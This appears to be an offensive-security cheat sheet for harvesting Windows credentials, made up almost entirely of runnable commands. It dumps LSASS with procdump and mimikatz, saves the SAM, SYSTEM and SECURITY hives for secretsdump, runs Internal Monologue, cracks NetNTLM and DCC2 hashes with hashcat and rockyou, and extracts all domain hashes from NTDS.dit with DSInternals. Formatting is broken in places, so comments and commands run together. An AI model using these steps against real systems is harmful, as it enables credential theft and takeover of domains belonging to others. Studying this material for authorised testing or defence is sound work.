Internal monologue is a way of dumping creds without touching LSASS.
execute-assembly /root/ADShare/NET4.6.2/InternalMonologue.exe [help]
hashcat hashes.txt /usr/share/wordlists/rockyou.txt -m 5500 -force
# Dump with sysinternal windows signed binaryprocdump64.exe -accepteula -ma lsass.exe lsass.dmp​# Move lsass.dmp offline and use mimikatz to open and dump passwordsmimikatz # sekurlsa::minidump /root/lsass.dmpmimikatz # sekurlsa::logonpasswords​# Viewing dump with invoke-mimikatzInvoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump C:\lsass.dmp" "sekurlsa::logonpasswords"'
reg save hklm\system systemreg save hklm\security securityreg save hklm\sam sam​# Extractpython secretsdump.py -security security -system system -sam sam LOCAL​# Cracking MS-Cachev2 hashes recoveredMake the this format:$DCC2$10240#username#hash​Crack:hashcat -m2100 '$DCC2$10240#spot#3407de6ff2f044ab21711a394d85f3b8' /usr/share/wordlists/rockyou.txt --force --potfile-disable
# For this you need the NTDS.dit file and the SYSTEM registry hive# You will also need DSInternals PowerShell module. This can be moved across machines.​# Import DSInternalsimport-module C:\Users\Administrator\Documents\DS\DSInternals\4.3\DSInternals.psd1​# Grab the bootkey from SYSTEM hive. This can be one offline or in a mounted DC VM.$key = Get-BootKey -SystemHivePath D:\Windows\System32\config\SYSTEM# Extract user information from NTDS.ditGet-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key# Extract Hashes from NTDS.dit in a dcsync formatGet-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key | Format-Custom -View HashcatNT | Out-File vault-hashes.txt -Encoding ASCII​# File can then be cracked, used as normal DCSync would.